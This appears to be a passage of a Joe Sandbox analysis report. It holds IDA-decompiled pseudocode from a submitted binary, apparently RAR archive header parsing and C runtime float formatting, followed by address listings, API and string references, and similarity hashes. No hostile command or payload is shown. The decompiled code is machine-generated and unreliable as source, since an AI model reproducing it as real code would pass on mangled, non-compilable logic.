									 *(_t547 + 0x64) = _t362;
									 *(_t547 + 0x5c) = _t500;
								}
								_t257 = E00BA1954(_t395,  *(_t395 + 0x21f0));
								_t501 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t395 + 0x6ca8)) = E00BA3E3C( *((intOrPtr*)(_t395 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t395 + 0x6ca4)), _t538,  *(_t547 + 0x5c), _t501, _t501);
								 *((intOrPtr*)(_t395 + 0x6cac)) = _t501;
								_t502 =  *(_t395 + 0x21e8);
								__eflags = _t502 - 1;
								if(__eflags == 0) {
									E00BAAC0C(_t395 + 0x2208);
									_t420 = 5;
									memcpy(_t395 + 0x2208, _t511, _t420 << 2);
									_t503 = E00BAC620(_t502);
									 *(_t395 + 0x6cb5) = _t503 & 1;
									 *(_t395 + 0x6cb4) = _t503 >> 0x00000002 & 1;
									 *(_t395 + 0x6cb7) = _t503 >> 0x00000004 & 1;
									_t432 = 1;
									 *((char*)(_t395 + 0x6cba)) = 1;
									 *(_t395 + 0x6cbb) = _t503 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t395 + 0x6cb8)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = E00BAC620(_t503);
										_t270 = 0;
										_t432 = 1;
									}
									__eflags =  *(_t395 + 0x6cb5);
									if( *(_t395 + 0x6cb5) == 0) {
										L81:
										_t432 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t395 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t395 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t395 + 0x6cb9)) = _t432;
											_t433 =  *(_t547 + 0x58);
											__eflags = _t433 |  *(_t547 + 0x54);
											if((_t433 |  *(_t547 + 0x54)) != 0) {
												E00BA214E(_t395, _t547 + 0x30, _t433, _t395 + 0x2208);
											}
											L84:
											 *(_t547 + 0x60) =  *(_t547 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t502 - 3;
								if(_t502 <= 3) {
									__eflags = _t502 - 2;
									_t120 = (0 | _t502 != 0x00000002) - 1; // -1
									_t519 = (_t120 & 0xffffdcb0) + 0x45d0 + _t395;
									 *(_t547 + 0x2c) = _t519;
									E00BAAB72(_t519, 0);
									_t438 = 5;
									memcpy(_t519, _t395 + 0x21e4, _t438 << 2);
									_t541 =  *(_t547 + 0x2c);
									 *(_t547 + 0x60) =  *(_t395 + 0x21e8);
									 *(_t541 + 0x1058) =  *(_t547 + 0x64);
									 *((char*)(_t541 + 0x10f9)) = 1;
									 *(_t541 + 0x105c) =  *(_t547 + 0x5c);
									 *(_t541 + 0x1094) = E00BAC620(_t502);
									 *(_t541 + 0x1060) = E00BAC620(_t502);
									_t289 =  *(_t541 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t541 + 0x1064) = _t502;
									 *(_t541 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t541 + 0x1060) = 0x7fffffff;
										 *(_t541 + 0x1064) = 0x7fffffff;
									}
									_t442 =  *(_t541 + 0x105c);
									_t522 =  *(_t541 + 0x1064);
									_t290 =  *(_t541 + 0x1058);
									_t504 =  *(_t541 + 0x1060);
									__eflags = _t442 - _t522;
									if(__eflags < 0) {
										L51:
										_t290 = _t504;
										_t442 = _t522;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t541 + 0x106c) = _t442;
											 *(_t541 + 0x1068) = _t290;
											_t291 = E00BAC620(_t504);
											__eflags =  *(_t541 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t541 + 0x24)) = _t291;
											if(( *(_t541 + 0x1094) & 0x00000002) != 0) {
												E00BB0D1D(_t541 + 0x1040, _t504, E00BAC520(_t547 + 0x30), 0);
											}
											 *(_t541 + 0x1070) =  *(_t541 + 0x1070) & 0x00000000;
											__eflags =  *(_t541 + 0x1094) & 0x00000004;
											if(( *(_t541 + 0x1094) & 0x00000004) != 0) {
												 *(_t541 + 0x1070) = 2;
												 *((intOrPtr*)(_t541 + 0x1074)) = E00BAC520(_t547 + 0x30);
											}
											 *(_t541 + 0x1100) =  *(_t541 + 0x1100) & 0x00000000;
											_t292 = E00BAC620(_t504);
											 *(_t547 + 0x64) = _t292;
											 *(_t541 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t450 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t541 + 0x1c)) = _t450;
											__eflags = _t450 - 0x32;
											if(_t450 != 0x32) {
												 *((intOrPtr*)(_t541 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t541 + 0x18)) = E00BAC620(_t504);
											_t523 = E00BAC620(_t504);
											 *(_t541 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t541 + 0x18));
											 *(_t541 + 0x10f8) =  *(_t395 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t541 + 0x10fc;
													 *_t177 =  *(_t541 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t541 + 0x10fc) = 1;
											}
											_t456 =  *(_t541 + 8);
											 *(_t541 + 0x1098) = _t456 >> 0x00000003 & 1;
											 *(_t541 + 0x10fa) = _t456 >> 0x00000005 & 1;
											__eflags =  *(_t547 + 0x60) - 2;
											_t459 =  *(_t547 + 0x64);
											 *(_t541 + 0x1099) = _t456 >> 0x00000004 & 1;
											if( *(_t547 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t459 & 0x00000040;
												if((_t459 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t541 + 0x10f0)) = _t302;
												_t304 =  *(_t541 + 0x1094) & 1;
												 *(_t541 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t541 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t541 + 0x109c) =  ~( *(_t541 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t523 - 0x1fff;
												if(_t523 >= 0x1fff) {
													_t523 = 0x1fff;
												}
												E00BAC582(_t547 + 0x30, _t547 - 0x2074, _t523);
												 *((char*)(_t547 + _t523 - 0x2074)) = 0;
												_push(0x800);
												_t524 = _t541 + 0x28;
												_push(_t541 + 0x28);
												_push(_t547 - 0x2074);
												E00BB138C();
												_t463 =  *(_t547 + 0x58);
												__eflags = _t463 |  *(_t547 + 0x54);
												if((_t463 |  *(_t547 + 0x54)) != 0) {
													E00BA214E(_t395, _t547 + 0x30, _t463, _t541);
												}
												_t319 =  *(_t547 + 0x60);
												__eflags =  *(_t547 + 0x60) - 2;
												if( *(_t547 + 0x60) != 2) {
													L72:
													_t320 = E00BC3429(_t319, _t524, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t395 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00BA207F(_t395, _t541);
													_t319 =  *(_t547 + 0x60);
													__eflags =  *(_t547 + 0x60) - 2;
													if( *(_t547 + 0x60) == 2) {
														L74:
														__eflags =  *(_t547 + 0x6b);
														if(__eflags != 0) {
															E00BA7032(__eflags, 0x1c, _t395 + 0x1e, _t524);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t504;
										if(_t290 > _t504) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t502 - 4;
								if(_t502 == 4) {
									_t471 = 5;
									memcpy(_t395 + 0x2248, _t395 + 0x21e4, _t471 << 2);
									_t331 = E00BAC620(_t502);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t395 + 0x225c) = E00BAC620(_t502) & 0x00000001;
										_t335 = E00BAC4D3(_t547 + 0x30) & 0x000000ff;
										 *(_t395 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E00BAC582(_t547 + 0x30, _t395 + 0x2264, 0x10);
											__eflags =  *(_t395 + 0x225c);
											if( *(_t395 + 0x225c) != 0) {
												E00BAC582(_t547 + 0x30, _t395 + 0x2274, 8);
												E00BAC582(_t547 + 0x30, _t547 + 0x64, 4);
												E00BAF807(_t547 - 0x74);
												E00BAF84D(_t547 - 0x74, _t395 + 0x2274, 8);
												_push(_t547 + 8);
												E00BAF716(_t547 - 0x74);
												_t350 = E00BBFC4A(_t547 + 0x64, _t547 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t395 + 0x225c) = _t352;
											}
											 *((char*)(_t395 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t547);
										E00BA3FD6();
										E00BA3F81(_t395, _t395 + 0x1e, _t547);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t502 - 5;
								if(_t502 == 5) {
									_t480 = _t502;
									memcpy(_t395 + 0x4590, _t395 + 0x21e4, _t480 << 2);
									 *(_t395 + 0x45ac) = E00BAC620(_t502) & 0x00000001;
									 *((short*)(_t395 + 0x45ae)) = 0;
									 *((char*)(_t395 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t485 = E00BAC620(_t500);
							 *(_t547 + 0x54) = _t500;
							_t256 = 0;
							 *(_t547 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t485 -  *(_t395 + 0x21f0);
							if(_t485 >=  *(_t395 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00BA203A(_t395);
						 *((char*)(_t395 + 0x6cc4)) = 1;
						E00BA6F5B(0xbdff50, 3);
						__eflags =  *((char*)(_t547 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00BA7032(__eflags, 4, _t395 + 0x1e, _t395 + 0x1e);
							 *((char*)(_t395 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00BA3F40(_t395, _t500);
					goto L86;
				}
				_t500 =  *((intOrPtr*)(_t395 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t559 =  *((intOrPtr*)(_t395 + 0x6ca4));
				if(_t559 < 0 || _t559 <= 0 &&  *((intOrPtr*)(_t395 + 0x6ca0)) <= _t500) {
					goto L15;
				} else {
					 *((char*)(_t547 + 0x6a)) = 1;
					 *0xbd2260(_t547 + 0x18, 0x10);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t395 + 0xc))))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t547 + 0x6b) = 1;
						L8:
						E00BA3DC9(_t395);
						_t531 = _t395 + 0x2264;
						_t546 = _t395 + 0x1024;
						E00BA6219(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t395 + 0x2264, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
						if( *(_t395 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t547 + 0x50)) = _t546;
							goto L16;
						} else {
							_t379 = _t395 + 0x2274;
							while(1) {
								_t381 = E00BBFC4A(_t547 + 0x28, _t379, 8);
								_t549 = _t549 + 0xc;
								if(_t381 == 0) {
									goto L13;
								}
								_t566 =  *(_t547 + 0x6b);
								_t382 = _t395 + 0x1e;
								_push(_t382);
								_push(_t382);
								if( *(_t547 + 0x6b) != 0) {
									_push(6);
									E00BA7032(__eflags);
									 *((char*)(_t395 + 0x6cc5)) = 1;
									E00BA6F5B(0xbdff50, 0xb);
									goto L86;
								}
								_push(0x7d);
								E00BA7032(_t566);
								E00BAEA67( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024);
								E00BA3DC9(_t395);
								E00BA6219(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t531, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
								_t379 = _t395 + 0x2274;
								if( *(_t395 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t393 = E00BB12B2();
					 *(_t547 + 0x6b) = 0;
					if(_t393 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00ba326d
0x00ba326e
0x00ba3276
0x00ba3280
0x00ba3287
0x00ba328e
0x00ba3295
0x00ba3298
0x00ba32a1
0x00ba33f4
0x00ba33f4
0x00ba33f7
0x00ba33f7
0x00ba3404
0x00ba3415
0x00ba341c
0x00ba342c
0x00ba3436
0x00ba3438
0x00ba343f
0x00ba3441
0x00ba3a71
0x00ba3a73
0x00ba3a78
0x00ba3a7b
0x00ba3a89
0x00ba3a94
0x00ba3a94
0x00ba3447
0x00ba3449
0x00000000
0x00000000
0x00ba344f
0x00ba3455
0x00ba3457
0x00ba3457
0x00ba3459
0x00ba345c
0x00000000
0x00000000
0x00ba3462
0x00ba3465
0x00000000
0x00000000
0x00ba346b
0x00ba346f
0x00ba3474
0x00ba3477
0x00000000
0x00000000
0x00ba347c
0x00ba348e
0x00ba3494
0x00ba3499
0x00ba34a4
0x00ba34a6
0x00ba34af
0x00ba34b5
0x00ba34bb
0x00ba34c1
0x00ba34c4
0x00ba34c7
0x00ba34c9
0x00ba3503
0x00ba3503
0x00ba3505
0x00ba350c
0x00ba350f
0x00ba3512
0x00ba353c
0x00ba353c
0x00ba3543
0x00ba3545
0x00ba3548
0x00ba354b
0x00ba3550
0x00ba3555
0x00ba3557
0x00ba355a
0x00ba355a
0x00ba3565
0x00ba3572
0x00ba3581
0x00ba358a
0x00ba3592
0x00ba3599
0x00ba359f
0x00ba35a1
0x00ba39b2
0x00ba39c1
0x00ba39c2
0x00ba39cc
0x00ba39d5
0x00ba39e2
0x00ba39f1
0x00ba39fc
0x00ba39ff
0x00ba3a05
0x00ba3a0b
0x00ba3a0d
0x00ba3a13
0x00ba3a16
0x00ba3a2d
0x00ba3a18
0x00ba3a20
0x00ba3a28
0x00ba3a2a
0x00ba3a2a
0x00ba3a33
0x00ba3a3a
0x00ba3a44
0x00ba3a44
0x00000000
0x00ba3a3c
0x00ba3a3c
0x00ba3a42
0x00ba3a46
0x00ba3a46
0x00ba3a4c
0x00ba3a51
0x00ba3a54
0x00ba3a64
0x00ba3a64
0x00ba3a69
0x00ba3a6c
0x00000000
0x00ba3a6c
0x00000000
0x00ba3a42
0x00ba3a3a
0x00ba35a7
0x00000000
0x00000000
0x00ba35ad
0x00ba35b0
0x00ba36f2
0x00ba36fa
0x00ba3709
0x00ba370d
0x00ba3710
0x00ba3717
0x00ba371e
0x00ba3729
0x00ba372c
0x00ba3732
0x00ba373b
0x00ba3742
0x00ba3750
0x00ba375b
0x00ba376a
0x00ba376a
0x00ba376c
0x00ba3772
0x00ba3778
0x00ba377f
0x00ba3785
0x00ba3785
0x00ba378b
0x00ba3791
0x00ba3797
0x00ba379d
0x00ba37a3
0x00ba37a5
0x00ba37ad
0x00ba37ad
0x00ba37af
0x00000000
0x00ba37a7
0x00ba37a7
0x00ba37b1
0x00ba37b1
0x00ba37ba
0x00ba37c0
0x00ba37c5
0x00ba37cc
0x00ba37cf
0x00ba37e2
0x00ba37e2
0x00ba37e7
0x00ba37ee
0x00ba37f5
0x00ba37fa
0x00ba3809
0x00ba3809
0x00ba380f
0x00ba3819
0x00ba3820
0x00ba3829
0x00ba3831
0x00ba3834
0x00ba3837
0x00ba383a
0x00ba383c
0x00ba383c
0x00ba384e
0x00ba3862
0x00ba3864
0x00ba386e
0x00ba3873
0x00ba3879
0x00ba387b
0x00ba3885
0x00ba3887
0x00ba3889
0x00ba3889
0x00ba3889
0x00ba3889
0x00ba387d
0x00ba387d
0x00ba387d
0x00ba3890
0x00ba389a
0x00ba38ac
0x00ba38b2
0x00ba38b6
0x00ba38b9
0x00ba38bf
0x00ba38ca
0x00ba38ca
0x00ba38ca
0x00000000
0x00ba38c1
0x00ba38c1
0x00ba38c4
0x00000000
0x00000000
0x00ba38c6
0x00ba38cc
0x00ba38cc
0x00ba38d8
0x00ba38dd
0x00ba38f2
0x00ba38f8
0x00ba3907
0x00ba390c
0x00ba3917
0x00ba3919
0x00ba391b
0x00ba391b
0x00ba3928
0x00ba392d
0x00ba393b
0x00ba3940
0x00ba3943
0x00ba3944
0x00ba3945
0x00ba394a
0x00ba394f
0x00ba3952
0x00ba395c
0x00ba395c
0x00ba3961
0x00ba3964
0x00ba3967
0x00ba3979
0x00ba397f
0x00ba3986
0x00ba3988
0x00ba398a
0x00ba398a
0x00000000
0x00ba3969
0x00ba396c
0x00ba3971
0x00ba3974
0x00ba3977
0x00ba3991
0x00ba3991
0x00ba3995
0x00ba39a2
0x00ba39a2
0x00000000
0x00ba3995
0x00000000
0x00ba3977
0x00ba3967
0x00ba38bf
0x00ba37a9
0x00ba37ab
0x00000000
0x00000000
0x00000000
0x00ba37ab
0x00ba37a5
0x00ba35b6
0x00ba35b9
0x00ba35fa
0x00ba3607
0x00ba360c
0x00ba3611
0x00ba3613
0x00ba364a
0x00ba3655
0x00ba3658
0x00ba365e
0x00ba3661
0x00ba3677
0x00ba367c
0x00ba3683
0x00ba3691
0x00ba369f
0x00ba36a8
0x00ba36b4
0x00ba36bc
0x00ba36c1
0x00ba36d0
0x00ba36da
0x00ba36dc
0x00ba36dc
0x00ba36de
0x00ba36de
0x00ba36e4
0x00000000
0x00ba36e4
0x00ba3663
0x00ba3664
0x00ba361b
0x00ba361e
0x00ba3620
0x00ba3621
0x00ba3633
0x00000000
0x00ba3633
0x00ba3615
0x00ba3616
0x00000000
0x00ba3616
0x00ba35bb
0x00ba35be
0x00ba35c5
0x00ba35d2
0x00ba35de
0x00ba35e6
0x00ba35ed
0x00ba35ed
0x00000000
0x00ba35be
0x00ba351c
0x00ba351e
0x00ba3521
0x00ba3523
0x00ba3526
0x00ba3528
0x00000000
0x00000000
0x00ba352a
0x00000000
0x00000000
0x00ba3530
0x00ba3536
0x00000000
0x00000000
0x00000000
0x00ba3536
0x00ba34cd
0x00ba34d9
0x00ba34e0
0x00ba34e5
0x00ba34e9
0x00000000
0x00ba34eb
0x00ba34f2
0x00ba34f7
0x00000000
0x00ba34f7
0x00ba34e9
0x00ba3406
0x00ba3408
0x00000000
0x00ba3408
0x00ba32af
0x00ba32b2
0x00ba32b4
0x00ba32ba
0x00000000
0x00ba32ce
0x00ba32d6
0x00ba32df
0x00ba32ec
0x00000000
0x00000000
0x00ba32ff
0x00ba330e
0x00ba330e
0x00ba3312
0x00ba3314
0x00ba3330
0x00ba333c
0x00ba3348
0x00ba3354
0x00ba33d0
0x00ba33d0
0x00000000
0x00ba3356
0x00ba3356
0x00ba335c
0x00ba3363
0x00ba3368
0x00ba336d
0x00000000
0x00000000
0x00ba336f
0x00ba3373
0x00ba3376
0x00ba3377
0x00ba3378
0x00ba33d5
0x00ba33d7
0x00ba33e3
0x00ba33ea
0x00000000
0x00ba33ea
0x00ba337a
0x00ba337c
0x00ba338d
0x00ba3394
0x00ba33bc
0x00ba33c8
0x00ba33ce
0x00000000
0x00000000
0x00000000
0x00ba33ce
0x00000000
0x00ba335c
0x00ba3354
0x00ba3301
0x00ba3306
0x00ba330c
0x00000000
0x00000000
0x00000000
0x00ba330c

APIs

__EH_prolog.LIBCMT ref: 00BA3276
_memcmp.LIBVCRUNTIME ref: 00BA3363

Strings

hc%u, xrefs: 00BA3664
CMT, xrefs: 00BA3979
h%u, xrefs: 00BA3616

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 9edc86d702f09ab14f48ea86b44e2a66428727769008fc0b26d67731aadbe7d4
Instruction ID: ca2a3beeb43967eaba3969aa7e6778b8e60f15f8ca29086956b3c845c2a1483c
Opcode Fuzzy Hash: 9edc86d702f09ab14f48ea86b44e2a66428727769008fc0b26d67731aadbe7d4
Instruction Fuzzy Hash: 483285715182849FDF14DF74C895AEA3BE5EF16700F0444BDFD8A8B282EB749A49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCECE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 67%

			E00BCCECE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t778;
				signed int _t779;
				signed int _t785;
				signed int _t791;
				intOrPtr _t793;
				void* _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t806;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t828;
				signed int _t829;
				signed int _t835;
				signed int _t836;
				signed int _t839;
				signed int _t844;
				signed int _t852;
				signed int* _t855;
				signed int _t859;
				signed int _t870;
				signed int _t871;
				signed int _t873;
				char* _t874;
				signed int _t877;
				signed int _t881;
				signed int _t882;
				signed int _t887;
				signed int _t889;
				signed int _t894;
				signed int _t903;
				signed int _t906;
				signed int _t908;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t916;
				signed int _t929;
				signed int _t930;
				signed int _t932;
				char* _t933;
				signed int _t936;
				signed int _t940;
				signed int _t941;
				signed int* _t943;
				signed int _t946;
				signed int _t948;
				signed int _t953;
				signed int _t961;
				signed int _t964;
				signed int _t968;
				signed int* _t975;
				intOrPtr _t977;
				void* _t978;
				intOrPtr* _t980;
				signed int* _t984;
				unsigned int _t995;
				signed int _t996;
				void* _t999;
				signed int _t1000;
				void* _t1002;
				signed int _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1015;
				signed int _t1020;
				signed int _t1023;
				unsigned int _t1026;
				signed int _t1027;
				void* _t1030;
				signed int _t1031;
				void* _t1033;
				signed int _t1034;
				signed int _t1035;
				signed int _t1036;
				signed int _t1041;
				signed int* _t1046;
				signed int _t1048;
				signed int _t1058;
				void _t1061;
				signed int _t1064;
				void* _t1067;
				void* _t1074;
				signed int _t1080;
				signed int _t1081;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1093;
				signed int _t1097;
				signed int _t1098;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				unsigned int _t1114;
				void* _t1117;
				intOrPtr _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int* _t1126;
				void* _t1130;
				void* _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				signed int _t1146;
				signed int _t1149;
				char _t1154;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				unsigned int _t1173;
				void* _t1177;
				void* _t1178;
				unsigned int _t1179;
				signed int _t1184;
				signed int _t1185;
				signed int _t1187;
				signed int _t1188;
				intOrPtr* _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1197;
				signed int _t1199;
				signed int _t1200;
				void* _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				void* _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				intOrPtr* _t1221;
				intOrPtr* _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1229;
				signed int _t1235;
				signed int _t1239;
				signed int _t1240;
				signed int _t1245;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1273;
				signed int _t1276;
				signed int _t1278;
				signed int* _t1279;
				signed int* _t1282;
				signed int _t1291;

				_t1145 = __edx;
				_t1276 = _t1278;
				_t1279 = _t1278 - 0x964;
				_t743 =  *0xbdd668; // 0xb57946a0
				_v8 = _t743 ^ _t1276;
				_t1058 = _a20;
				_push(__esi);
				_push(__edi);
				_t1190 = _a16;
				_v1924 = _t1190;
				_v1920 = _t1058;
				E00BCC9F6( &_v1944, __eflags);
				_t1239 = _a8;
				_t748 = 0x2d;
				if((_t1239 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1190 = _t748;
				 *((intOrPtr*)(_t1190 + 8)) = _t1058;
				_t1191 = _a4;
				if((_t1239 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00BC8FD4( &_a4);
					_pop(_t1073);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1073 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t778 = _t754 - 1;
						__eflags = _t778;
						if(_t778 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t779 = _t778 - 1;
							__eflags = _t779;
							if(_t779 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t779 == 1;
								if(_t779 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1191;
									_a8 = _t1239 & 0x7fffffff;
									_t1291 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1193 = _v1896;
									_v1916 = _a12 + 1;
									_t1080 = _t1193 >> 0x14;
									_t785 = _t1080 & 0x000007ff;
									__eflags = _t785;
									if(_t785 != 0) {
										_t1146 = 0;
										_t785 = 0;
										__eflags = 0;
									} else {
										_t1146 = 1;
									}
									_t1194 = _t1193 & 0x000fffff;
									_t1061 = _v1900 + _t785;
									asm("adc edi, esi");
									__eflags = _t1146;
									_t1081 = _t1080 & 0x000007ff;
									_t1245 = _t1081 - 0x434 + (0 | _t1146 != 0x00000000) + 1;
									_v1872 = _t1245;
									E00BCEA40(_t1081, _t1291);
									_push(_t1081);
									_push(_t1081);
									 *_t1279 = _t1291;
									_t791 = E00BD18A0(E00BCEB50(_t1194, _t1245), _t1291);
									_v1904 = _t791;
									__eflags = _t791 - 0x7fffffff;
									if(_t791 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t791 - 0x80000000;
										if(_t791 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1061;
									__eflags = _t1194;
									_v464 = _t1194;
									_t1064 = (0 | _t1194 != 0x00000000) + 1;
									_v472 = _t1064;
									__eflags = _t1245;
									if(_t1245 < 0) {
										__eflags = _t1245 - 0xfffffc02;
										if(_t1245 == 0xfffffc02) {
											L101:
											_t793 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
